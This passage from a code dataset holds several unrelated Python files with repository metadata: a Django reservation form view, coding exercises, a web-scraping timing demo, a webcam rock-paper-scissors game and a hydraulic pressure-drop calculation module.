Exception(\"No reservation provided\")\n f: Form = Form()\n if a.group is None:\n f.action_url = \"/admin/actions/add-article-to-reservation?rid=\" + str(int(request.GET[\"rid\"])) + \\\n \"&article_id=\" + str(a.pk) + \"&redirect=/admin/reservations/edit\"\n if request.GET.get(\"srid\"):\n f.action_url += '&srid=' + str(request.GET[\"srid\"])\n f.add(PlainText(\"Price: \" + render_price(a.price) + \"<br />\"))\n f.add_content(PlainText(\"Specify amount: \"))\n f.add_content(NumberField(name=\"quantity\", minimum=1, maximum=get_article_pcs_free(a),\n button_text=\"1\"))\n f.add_content(PlainText(\"Maybe add some optional 
notes:\"))\n f.add_content(TextArea(name=\"notes\", label_text=\"Notes:\", text=\"\"))\n f.add_content(PlainText(\"<br />\"))\n else:\n grp = a.group\n f.action_url = \"/admin/actions/add-article-to-reservation?group_id=\" + str(grp.pk) + \\\n \"&redirect=/admin/reservations/edit&rid=\" + str(int(request.GET[\"rid\"]))\n if request.GET.get(\"srid\"):\n f.action_url += '&srid=' + str(request.GET[\"srid\"])\n sizes, types, sizesdict = get_article_dict(grp)\n f.add(PlainText(\"<table><thead><tr><th> Version </th>\"))\n for s in sizes:\n f.add(PlainText(\"<th>\" + str(s) + \"</th>\"))\n f.add(PlainText(\"</tr></thead><tbody>\"))\n for t in types:\n f.add(PlainText(\"<tr><td>\" + get_type_string(t) + \"</td>\"))\n for s in sizes:\n f.add(PlainText(\"<td>\"))\n if sizesdict[s].get(t):\n quantity, price, aid, description, visible = sizesdict[s][t]\n if not visible:\n f.add(PlainText(\"Currently not avaiable\"))\n pcsfree = get_article_pcs_free(Article.objects.get(pk=aid))\n if visible and pcsfree > 0:\n f.add(PlainText(\"Price: \" + render_price(price) + \"<br />\"))\n f.add_content(PlainText(\"Specify amount: \"))\n f.add_content(NumberField(name=\"quantity_\" + str(aid), minimum=0, \n maximum=pcsfree, button_text=\"0\"))\n f.add_content(PlainText(\"Maybe add some optional notes:\"))\n f.add_content(TextArea(name=\"notes_\" + str(aid), label_text=\"Notes:\", text=\"\"))\n else:\n f.add(PlainText(\"Unfortunately this article is already sold out.\"))\n else:\n f.add(PlainText(\"Currently not avaiable\"))\n f.add(PlainText(\"</td>\"))\n f.add(PlainText(\"</tr>\"))\n f.add(PlainText(\"</tbody></table><br />\"))\n f.add_content(SubmitButton())\n a = render_headbar(request, title=\"Specify article details\")\n a += '<div class=\"\"><div class=\"w3-row w3-padding-64 w3-twothird w3-container\">' \\\n '<h3>Please specify further details:</h3>'\n a += f.render_html(request)\n a += '</div></div>' + render_footer(request)\n return HttpResponse(a)\n except Exception as e:\n return redirect(\"/admin/?error=\" + str(e))\n","repo_name":"Technikradio/C3FOCSite","sub_path":"c3shop/frontpage/management/articletools/article_select.py","file_name":"article_select.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"293953686","text":"import sys\nfrom datetime import datetime\n\ndef validate_date(date_str):\n try:\n date = datetime.strptime(date_str, \"%Y%m%d\")\n return date >= datetime(1600, 1, 1)\n except ValueError:\n return False\n\ndef main():\n dates = []\n for line in sys.stdin:\n if validate_date(line):\n dates.append(datetime.strptime(line, \"%Y%m%d\"))\n legal_dates = sorted(dates)\n\n if len(legal_dates) < 2:\n print(-1)\n return \n min_difference = (legal_dates[1] - legal_dates[0]).days\n\n for i in range(2, len(legal_dates)):\n difference = (legal_dates[i] - legal_dates[i - 1]).days\n min_difference = min(min_difference, difference)\n\n print(min_difference)\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"manekiyong/coding_workshop","sub_path":"exercise_q1_closest_dates.py","file_name":"exercise_q1_closest_dates.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7953699097","text":"from django.db import models\nimport uuid\nfrom django.db.models.signals import post_init\nfrom django.dispatch import receiver\n\n\nclass APIKey(models.Model):\n app = models.CharField(max_length=64)\n key 
= models.CharField(max_length=64)\n\n def __unicode__(self):\n return self.app\n\n def generate_key(self, app):\n self.app = app\n self.key = str(uuid.uuid4())\n\n\n@receiver(post_init, sender=APIKey)\ndef APIKey_post_init(sender, instance, **kwargs):\n if not instance.pk and len(instance.key) == 0:\n instance.generate_key(\"\")\n","repo_name":"node13h/IPhistdb-API","sub_path":"apiv1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11396826463","text":"'''\n# Web scraping with the Pool class\n\n# Web scraping for multiprocessing\n# without multiprocessing\n# scrape the contents of the site https://beomi.github.io/beomi.github.io_old/\n'''\nimport requests # load the module for fetching web documents from the target site\nfrom bs4 import BeautifulSoup as bs # load the module for parsing the fetched web documents\nimport time # for measuring elapsed time\n\nfrom multiprocessing import Pool\n\ndef get_link(): # read the title a-tags; collects the URLs of the a tags linked on the target site\n data = requests.get(\"https://beomi.github.io/beomi.github.io_old/\").text\n soup = bs(data, 'html.parser')\n my_titles = soup.select('h3 > a')\n\n data = []\n \n for title in my_titles:\n data.append(title.get('href'))\n \n return data\n\ndef get_content(link): # visit the URL received from get_link() and read the title\n # print(link)\n abs_link = 'https://beomi.github.io' + link\n #print(abs_link)\n data = requests.get(abs_link).text\n soup = bs(data, 'html.parser') # parse the fetched data (here we only care how long processing takes)\n # we could do something further with the fetched data ...\n print(soup.select('h1')[0].text) # print only the text of the first h1 tag\n \nif __name__ == '__main__':\n startTime = time.time()\n \n # 1) without multiprocessing -> 1.4\n # print(get_link()) # print the links\n # print(len(get_link())) # 26 (total number fetched)\n for link in get_link():\n get_content(link)\n \n # 2) with multiprocessing (parallel processing) -> 0.9\n# pool = Pool(processes = 4) # use 4 processes\n# pool.map(get_content, get_link()) # fetch content for every link by mapping the function over the arguments\n \n print('--- %s seconds ---'%(time.time() - startTime)) # compare the times with and without multiprocessing\n\n\n\n","repo_name":"shinbumjun/Python","sub_path":"pypro1/pack6network/test50pool_scraping.py","file_name":"test50pool_scraping.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37271465629","text":"\"\"\"Arrays\n\nhttps://www.hackerrank.com/challenges/np-arrays/problem?isFullScreen=false\n\nTask\n\nYou are given a space separated list of numbers.\nYour task is to print a reversed NumPy array with the element type float.\"\"\"\n\n\nimport numpy\n\n\ndef arrays(arra):\n arr = numpy.array(arra, float)\n return numpy.flip(arr)\n\n\nar = input().strip().split(' ')\nresult = arrays(ar)\nprint(result)\n","repo_name":"BrunoBaia/Hackerrank","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1944325092","text":"from collections import defaultdict\n\ndef neighbor(pattern, mismatch, candidate_kmers):\n bases = ['A', 'T', 'G', 'C']\n for i in range(len(pattern)):\n for j in range(len(bases)):\n new_kmer = pattern[:i] + bases[j] + pattern[i+1:]\n if (mismatch <= 1):\n candidate_kmers.add(new_kmer)\n else:\n neighbor(new_kmer, mismatch-1, candidate_kmers)\n\ndna = \"ACGTTGCATGTCGCATGATGCATGAGAGCT\"\nk, d = 4, 1\nn = len(dna)\nans = defaultdict(int)\n\nfor i in range(n-k+1):\n candidate_kmers = set()\n sub = dna[i:i+k]\n neighbor(sub, d, candidate_kmers)\n\n for kmer in candidate_kmers:\n ans[kmer] += 
1\n\nmx = max(ans.values())\nfor k in ans:\n if mx == ans[k]:\n print(k, end=\" \")\n","repo_name":"Jak57/bio-informatics-lab","sub_path":"BA1I.py","file_name":"BA1I.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40929195822","text":"from collections import Counter, defaultdict\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n t_count = Counter(t)\n window = defaultdict(int)\n left = 0\n count = 0\n res = \"\"\n\n for right in range(len(s)):\n\n if s[right] in t_count:\n window[s[right]] += 1\n\n if t_count[s[right]] == window[s[right]]:\n count += 1\n\n while count == len(t_count):\n if not res or (right - left + 1) < len(res):\n res = s[left:right + 1]\n if s[left] in t_count:\n window[s[left]] -= 1\n\n if window[s[left]] < t_count[s[left]]:\n count -= 1\n if window[s[left]] == 0:\n del window[s[left]]\n left += 1\n\n return res","repo_name":"yordi68/Competitive_Programming","sub_path":"minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7900638841","text":"# +3\n\nfrom itertools import permutations\ndef operations(num1, num2, s):\n # operands arrive as strings, so cast to int\n if s == '+':\n return str(int(num1) + int(num2))\n if s == '-':\n return str(int(num1) - int(num2))\n if s == '*':\n return str(int(num1) * int(num2))\n\ndef calculate(exp, sign):\n # store the numbers and operators of the given expression as strings in array\n array = []\n temp = ''\n for i in exp:\n # accumulate consecutive digits in temp\n if i.isdigit():\n temp += i\n else:\n array.append(temp)\n array.append(i)\n temp = ''\n array.append(temp)\n # store any number left over at the end as well\n\n # Calculation:\n # if a token matches the operator with the current priority, apply the operation;\n # otherwise stack the tokens up one by one\n for i in sign:\n stack = []\n while len(array) != 0:\n temp = array.pop(0)\n # if the token matches the current-priority operator,\n # pop the previous number, take the next one, and compute\n if temp == i:\n stack.append(operations(stack.pop(), array.pop(0), i))\n # otherwise just push the token onto the stack\n else:\n stack.append(temp)\n array = stack\n return abs(int(array[0]))\n\ndef solution(expression):\n signs = list(permutations(['+', '-', '*'], 3))\n answer = []\n for sign in signs:\n answer.append(calculate(expression, sign))\n return answer\n\n\nexpression = \"100-200*300-500+20\"\n# expression =\"50*6-3*2\"\nprint(solution(expression))","repo_name":"GayeonKimm/CT","sub_path":"Programmers/2_level/수식 최대화.py","file_name":"수식 최대화.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387543448","text":"import configparser\r\nimport os\r\n\r\nCONFIG = \"config.ini\"\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.ConfigParser()\r\n config.add_section(\"options\")\r\n config.set(\"options\", \"User_Table\", \"User.db\")\r\n config.set(\"options\", \"Transaction_Table\", \"Transaction.db\")\r\n config.set(\"options\", \"Session_file\", \"session.txt\")\r\n\r\n if os.path.exists(CONFIG):\r\n os.remove(CONFIG)\r\n\r\n with open(CONFIG, 'w') as example:\r\n config.write(example)\r\n","repo_name":"PaulCalderon/ATM-Machine","sub_path":"configmaker.py","file_name":"configmaker.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20876883972","text":"import cv2\nfrom keras.models import load_model\nimport numpy as np\nimport time\nimport random\nfrom 
camera_input import get_prediction\n\ncomputer_wins = 0\nuser_wins = 0\n\n\ndef get_computer_choice():\n computer_choice = random.choice(['Rock', 'Paper', 'Scissors'])\n return computer_choice\n\n\ndef get_winner(computer_choice, user_choice):\n global computer_wins, user_wins\n if computer_choice == 'Rock' and user_choice == 'Paper':\n print('You won! Paper beats Rock.')\n user_wins += 1\n elif computer_choice == 'Rock' and user_choice == 'Scissors':\n print('You lose. Rock beats Scissors.')\n computer_wins += 1\n elif computer_choice == 'Paper' and user_choice == 'Rock':\n print('You lose. Paper beats Rock.')\n computer_wins += 1\n elif computer_choice == 'Paper' and user_choice == 'Scissors':\n print('You won! Scissors beats Paper.')\n user_wins += 1\n elif computer_choice == 'Scissors' and user_choice == 'Rock':\n print('You won! Rock beats Scissors.')\n user_wins += 1\n elif computer_choice == 'Scissors' and user_choice == 'Paper':\n print('You lose. Scissors beats Paper.')\n computer_wins += 1\n elif computer_choice == user_choice:\n print('Draw.')\n else:\n print('Sorry, you did not enter a valid choice.')\n\n\nwhile computer_wins < 3 and user_wins < 3:\n prediction = get_prediction()\n computer_choice = get_computer_choice()\n choice_probability = {'Rock': prediction[0,0], 'Paper': prediction[0,1], 'Scissors': prediction[0,2]}\n user_prediction = max(choice_probability, key=choice_probability.get)\n\n print(f'\\nComputer went with {computer_choice}.')\n print(f'You went with {user_prediction}.')\n get_winner(computer_choice, user_prediction)\n print(f'\\nSCORE: You: {user_wins} vs. {computer_wins} Computer\\n')\n time.sleep(1)\n if computer_wins == 3:\n print(f'Computer has reached 3 wins. You have lost the game.\\n')\n break\n elif user_wins == 3:\n print(f'You have reached 3 wins. Congratulations, you have won the game!\\n')\n break\n\n","repo_name":"asadiceccarelli/Computer-Vision-RPS","sub_path":"camera_rps.py","file_name":"camera_rps.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73828411347","text":"import logging\nimport math\n\nimport numpy as np\nfrom scipy.optimize import fsolve\n\ntry:\n from CoolProp.CoolProp import PropsSI\n\nexcept ImportError:\n print(\"Need to install CoolProp to use the hydraulic \"\n \"pre-calculation module.\")\n\nlogger = logging.getLogger(__name__) # Create a logger for this module\n\n\ndef eq_smooth(x, R_e):\n r\"\"\"\n Implicit equation for the Darcy friction factor of hydraulically smooth surfaces.\n (Prandtl & Karman)\n\n .. eq_smooth_equation:\n\n :math:`f(x) = x-2 \\cdot log\\Big(\\frac{Re}{2.51x}\\Big)`\n\n Parameters\n ----------\n x: numeric\n :math:`x`: function variable [-]\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Equation : numeric\n\n \"\"\"\n return x - 2 * np.log10(R_e / (x * 2.51))\n\n\ndef eq_transition(x, R_e, k, d_i):\n r\"\"\"\n Equation to be solved for the transition range\n between a smooth and rough pipe surface (Prandtl-Colebrook)\n\n .. 
eq_transition_equation:\n\n :math:`f(x)=x+2\\cdot log \\big( \\frac{2.51x}{Re} + \\frac{k}{3.71d_i} \\big)`\n\n Parameters\n ----------\n x : numeric\n :math:`x`: function variable [-]\n\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n d_i : numeric\n :math:`d_i`: inner diameter [m]\n\n Returns\n -------\n Equation : numeric\n\n \"\"\"\n\n return x + 2 * np.log10((2.51 * x) / R_e + k / (3.71 * d_i))\n\n\ndef calc_k_v(d_v, d):\n r\"\"\"\n Calculates the kinematic viscosity for given density and dynamic viscosity\n\n .. calc_k_v_equation:\n\n :math:`\\nu = \\frac{\\eta}{\\rho}`\n\n Parameters\n ----------\n d_v: numeric\n :math:`\\eta`: dynamic viscosity [kg/(m*s)]\n\n d: numeric\n :math:`\\rho`: density [kg/m³]\n\n Returns\n -------\n kinematic viscosity [m²/s] : numeric\n\n \"\"\"\n return d_v / d\n\n\ndef calc_Re(v, d_i, k_v):\n r\"\"\"\n Calculates the Reynolds number for a given velocity, inner diameter\n and kinematic viscosity\n\n .. calc_Re_equation:\n\n :math:`\\frac{v \\cdot d_i}{\\nu}`\n\n Parameters\n ----------\n v: numeric\n :math:`v`: flow velocity [m/s]\n\n d_i: numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k_v: numeric\n :math:`\\nu`: kinematic viscosity [m²/s]\n\n Returns\n -------\n Reynolds number [-]: numeric\n\n \"\"\"\n return v * d_i / k_v\n\n\ndef calc_lambda_laminar(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a laminar flow\n\n .. calc_lam_lam_equation:\n\n :math:`\\lambda=\\frac{64}{Re}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 64 / Re\n\n\ndef calc_d_p(lam, length, d_i, d, v):\n r\"\"\"\n Calculates the pressure drop in a pipe for a given Darcy friction factor\n\n .. calc_d_p_equation:\n\n :math:`\\Delta p = \\lambda \\frac{l}{d_i} \\frac{\\rho}{2} v^2`\n\n Parameters\n ----------\n lam: numeric\n :math:`\\lambda`: Darcy friction factor [-]\n\n length: numeric\n :math:`l`: length of the pipe [m]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n d: numeric\n :math:`\\rho`: density [kg/m³]\n\n v: numeric\n :math:`v`: flow velocity [m/s]\n\n Returns\n -------\n Pressure drop [Pa]: numeric\n \"\"\"\n return lam * length / d_i * d / 2 * v ** 2\n\n\ndef calc_lambda_turb1(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number smaller\n than 10^5 (Blasius)\n\n .. calc_lam_turb1_equation:\n\n :math:`\\lambda = 0.3164 \\cdot Re^{-0.25}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 0.3164 * Re ** (-0.25)\n\n\ndef calc_lambda_turb2(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number\n between 10^5 and 10^6 (Nikuradse)\n\n .. 
calc_lam_turb2_equation:\n\n :math:`\\lambda = 0.0032 + 0.221 \\cdot Re^{-0.237}`\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 0.0032 + 0.221 * Re ** (-0.237)\n\n\ndef calc_lambda_turb3(Re):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow, a smooth pipe and a Reynolds number higher than 10^6.\n For a formula, see :func:`~precalc_hydraulic.eq_smooth`.\n\n Parameters\n ----------\n Re: numeric\n :math:`Re`: Reynolds number [-]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n lam_init = 0.3164 / (Re ** 0.25)\n\n x = fsolve(eq_smooth, x0=lam_init, args=Re)\n\n return 1 / x[0] ** 2\n\n\ndef calc_lambda_rough(d_i, k):\n r\"\"\"\n Calculates the Darcy friction factor for a turbulent flow\n and a rough inner pipe surface (Prandtl & Nikuradse)\n\n .. calc_lam_rough_equation:\n\n :math:`\\lambda = \\frac{1}{(2 log(3.71\\frac{d_i}{k}))^2}`\n\n Parameters\n ----------\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n return 1 / ((-2 * np.log10(k / (3.71 * d_i))) ** 2)\n\n\ndef calc_lambda_transition(R_e, k, d_i):\n r\"\"\"\n Calculates the Darcy friction factor for a given Reynolds number\n for a turbulent flow and the transition area between a rough and\n smooth pipe surface.\n\n See also :func:`~precalc_hydraulic.eq_transition`.\n\n Parameters\n ----------\n R_e: numeric\n :math:`Re`: Reynolds number [-]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n Returns\n -------\n Darcy friction factor [-] : numeric\n\n \"\"\"\n lam_init = 0.25 / R_e ** 0.2\n x = fsolve(eq_transition, x0=lam_init, args=(R_e, k, d_i))\n return 1 / x[0] ** 2\n\n\ndef delta_p(v, d_i, k=0.1, T_medium=90, length=1,\n pressure=101325, R_crit=2320, fluid='IF97::Water'):\n\n r\"\"\"\n Function to calculate the pressure loss in a pipeline\n\n Parameters\n ----------\n v : numeric\n :math:`v`: flow velocity [m/s]\n\n d_i : numeric\n :math:`d_i`: inner pipe diameter [m]\n\n k : numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n T_medium : numeric\n :math:`T_{medium}`: fluid temperature [°C]\n\n length : numeric\n :math:`l`: length of the pipe [m]\n\n pressure : numeric\n :math:`p`: pressure in the pipe [Pa]\n\n R_crit : numeric\n :math:`Re_{crit}`: critical Reynolds number between laminar and turbulent flow [-]\n\n fluid : str\n name of the fluid used\n\n Returns\n -------\n Pressure drop [Pa] : numeric\n\n \"\"\"\n k = k * 0.001\n\n # get density of water [kg/m^3]\n d = PropsSI('D', 'T', T_medium + 273.15, 'P', pressure, fluid)\n # dynamic viscosity eta [kg/(m*s)]\n d_v = PropsSI('V', 'T', T_medium + 273.15, 'P', pressure, fluid)\n k_v = calc_k_v(d_v, d)\n\n # Reynolds number\n R_e = calc_Re(v, d_i, k_v)\n\n if R_e < R_crit: # laminar flow\n lam = calc_lambda_laminar(R_e)\n d_p = calc_d_p(lam, length, d_i, d, v)\n\n else: # turbulent flow\n\n if R_e * k / d_i < 65:\n # Smooth pipe\n\n if R_e < 10**5:\n lam = calc_lambda_turb1(R_e)\n\n elif R_e >= 10**5 and R_e < 10**6:\n lam = calc_lambda_turb2(R_e)\n\n else:\n # Re > 10^6\n lam = calc_lambda_turb3(R_e)\n\n elif R_e * k / d_i > 1300:\n # Rough pipe\n lam = calc_lambda_rough(d_i, k)\n\n else:\n # Transition range 65 < Re * k/d < 1300\n lam = 
calc_lambda_transition(R_e, k, d_i)\n\n d_p = calc_d_p(lam, length, d_i, d, v)\n\n return d_p\n\n\ndef calc_v(vol_flow, d_i):\n r\"\"\"\n Calculates the velocity for a given volume flow and inner diameter of a pipe.\n\n .. calc_v_equation:\n\n :math:`v_{flow}=\\frac{\\dot{V}}{(\\frac{d_i}{2})^2*\\pi}`\n\n Parameters\n ----------\n vol_flow: numeric\n :math:`\\dot{V}`: volume flow [m³/h]\n\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n Returns\n -------\n flow velocity [m/s] : numeric\n\n \"\"\"\n return vol_flow / ((d_i * 0.5)**2 * math.pi * 3600)\n\n\ndef v_max_secant(d_i, T_average, k=0.1, p_max=100, p_epsilon=1,\n v_0=1, v_1=2,\n pressure=101325, fluid='IF97::Water'):\n r\"\"\"Calculates the maximum velocity via iterative approach\n using the secant method.\n\n The two different starting values v_0 and v_1 should be in the\n area of the maximum flow velocity, as iteration starts from there.\n\n Parameters\n ----------\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n T_average: numeric\n :math:`T_{av}`: average temperature [°C]\n\n k: numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n p_max: numeric\n :math:`p_{max}`: maximum pressure drop in pipeline [Pa]\n\n p_epsilon: numeric\n :math:`p_\\epsilon`: accuracy of pressure [Pa]\n\n v_0: numeric\n :math:`v_0`: first value of initial guess for maximum flow velocity [m/s]\n\n v_1: numeric\n :math:`v_1`: second value of initial guess for maximum flow velocity [m/s]\n\n pressure: numeric\n :math:`p`: pressure level [pa]\n\n fluid: str\n type of fluid, default: 'IF97::Water'\n\n Returns\n -------\n maximum flow velocity [m/s] : numeric\n\n \"\"\"\n p_new = 0\n v_new = 0\n n = 0\n while n < 100:\n n += 1\n\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n v_new = v_1 - (p_1 - p_max) * (v_1 - v_0) / (p_1 - p_0)\n\n p_new = delta_p(v_new, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if abs(p_new - p_max) < p_epsilon:\n break\n\n else:\n v_0 = v_1\n v_1 = v_new\n\n logger.info(\n \"Maximum flow velocity calculated. 
Iterations: %d, \"\n \"Flow velocity: %.4f [m/s], Pressure drop: %.4f [Pa/m]\"\n % (n, v_new, p_new)\n )\n\n return v_new\n\n\ndef v_max_bisection(d_i, T_average, k=0.1, p_max=100,\n p_epsilon=0.1, v_epsilon=0.001,\n v_0=0.01, v_1=10,\n pressure=101325, fluid='IF97::Water'):\n r\"\"\"Calculates the maximum velocity via bisection for a given pressure drop.\n\n The two starting values `v_0` and `v_1` need to be given,\n with `v_0` below the expected flow velocity and `v_1` above.\n These are the starting values for the bi-section method.\n\n If either of the stop criteria `p_epsilon` or `v_epsilon` is reached,\n the iterative calculation is stopped.\n\n Parameters\n ----------\n d_i: numeric\n :math:`d_i`: inner diameter [m]\n\n T_average: numeric\n :math:`T_{av}`: average temperature [°C]\n\n k: numeric\n :math:`k`: roughness of inner pipeline surface [mm]\n\n p_max: numeric\n :math:`p_{max}`: maximum pressure drop in pipeline [Pa]\n\n p_epsilon: numeric\n :math:`p_\\epsilon`: accuracy of pressure [Pa]\n\n v_epsilon: numeric\n :math:`v_\\epsilon`: accuracy of velocity [m/s]\n\n v_0 : numeric\n :math:`v_0`: first value of initial guess for maximum flow velocity [m/s]\n\n v_1: numeric\n :math:`v_1`: second value of initial guess for maximum flow velocity [m/s]\n\n pressure: numeric\n :math:`p`: pressure level [Pa]\n\n fluid: str\n type of fluid, default: 'IF97::Water'\n\n Returns\n -------\n maximum flow velocity [m/s] : numeric\n\n \"\"\"\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if (p_0 - p_max) * (p_1 - p_max) >= 0:\n raise AttributeError(\n \"The initial guesses `v_0` and `v_1` must be \"\n \"below and above the expected flow velocity.\"\n )\n\n p_new = 0\n v_new = 0\n n = 0\n while n < 200:\n n += 1\n\n p_0 = delta_p(v_0, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n p_1 = delta_p(v_1, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n v_new = 0.5 * (v_1 + v_0)\n\n p_new = delta_p(v_new, k=k, d_i=d_i, T_medium=T_average,\n pressure=pressure, fluid=fluid)\n\n if abs(p_new - p_max) < p_epsilon:\n logger.info(\"Bi-section method: p_epsilon criterion reached.\")\n break\n\n if abs(v_1 - v_0) < v_epsilon: # why v_1 and v_0?\n logger.info(\"Bi-section method: v_epsilon criterion reached.\")\n break\n\n else:\n # no stop criteria reached\n # check if p_new is above or below p_max\n if (p_0 - p_max) * (p_new - p_max) < 0:\n v_1 = v_new\n else:\n v_0 = v_new\n\n logger.info(\n \"Maximum flow velocity calculated. Iterations: %d, \"\n \"Flow velocity: %.4f [m/s], Pressure drop: %.4f [Pa/m]\"\n % (n, v_new, p_new)\n )\n\n return v_new\n\n\ndef calc_power(T_vl=80, T_rl=50, mf=3, p=101325):\n r\"\"\"\n Function to calculate the thermal power based on mass flow and temperature difference.\n\n .. 
def calc_power(T_vl=80, T_rl=50, mf=3, p=101325):\n r\"\"\"\n Function to calculate the thermal power based on mass flow and temperature difference.\n\n .. calc_power_equation:\n\n :math:`P_{th} = \\dot{m} \\cdot (c_{p_{VL}} \\cdot T_{VL} - c_{p_{RL}} \\cdot T_{RL})`\n\n Parameters\n ----------\n T_vl: numeric\n :math:`T_{VL}`: forward temperature [°C]\n\n T_rl: numeric\n :math:`T_{RL}`: return temperature [°C]\n\n mf: numeric\n :math:`\\dot{m}`: mass flow [kg/s]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n thermal power [W] : numeric\n\n \"\"\"\n cp_vl = PropsSI('C', 'T', T_vl + 273.15, 'P', p, 'IF97::Water')\n\n cp_rl = PropsSI('C', 'T', T_rl + 273.15, 'P', p, 'IF97::Water')\n\n return mf * (cp_vl * (T_vl + 273.15) - cp_rl * (T_rl + 273.15))\n\n\ndef calc_mass_flow(v, di, T_av, p=101325):\n r\"\"\"\n Calculates the mass flow in a pipe for a given flow velocity, inner diameter and temperature.\n The average temperature is needed for a correct value of the density.\n\n .. calc_mass_flow_equation:\n\n :math:`\\dot{m} = \\pi \\rho_{T_{av}} v \\big( \\frac{d_i}{2} \\big) ^2`\n\n Parameters\n ----------\n v : numeric\n :math:`v`: flow velocity [m/s]\n\n di : numeric\n :math:`d_i`: inner diameter [m]\n\n T_av : numeric\n :math:`T_{av}`: temperature level [°C]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n mass flow [kg/s] : numeric\n\n \"\"\"\n rho = PropsSI('D', 'T', T_av + 273.15, 'P', p, 'IF97::Water')\n\n return rho * v * (0.5 * di) ** 2 * math.pi\n\n\ndef calc_mass_flow_P(P, T_av, delta_T, p=101325):\n r\"\"\"\n Calculates the mass flow in a pipe for a given power and temperature difference.\n The average temperature is needed for a correct value of the heat capacity.\n\n .. calc_mass_flow_P_equation:\n\n :math:`\\dot{m} = \\frac{P}{c_{P_{T_{av}}} \\cdot \\Delta T}`\n\n Parameters\n ----------\n P : numeric\n :math:`P`: power [W]\n\n T_av : numeric\n :math:`T_{av}`: average temperature [°C]\n\n delta_T : numeric\n :math:`\\Delta T`: temperature difference [K]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n -------\n mass flow [kg/s]: numeric\n\n \"\"\"\n cp = PropsSI('C', 'T', T_av + 273.15, 'P', p, 'IF97::Water')\n\n return P / (cp * delta_T)\n\n\ndef calc_v_mf(mf, di, T_av, p=101325):\n r\"\"\"\n Calculates the flow velocity for a given mass flow and inner diameter.\n The average temperature is needed for a correct value of the density.\n\n .. calc_v_mf_equation:\n\n :math:`v = \\frac{\\dot{m}}{\\pi \\rho \\cdot \\big( \\frac{d_i}{2} \\big)^2 }`\n\n Parameters\n ----------\n mf : numeric\n :math:`\\dot{m}`: mass flow [kg/s]\n\n di : numeric\n :math:`d_i`: inner diameter [m]\n\n T_av : numeric\n :math:`T_{av}`: average temperature [°C]\n\n p: numeric\n :math:`p`: pressure [Pa]\n\n Returns\n 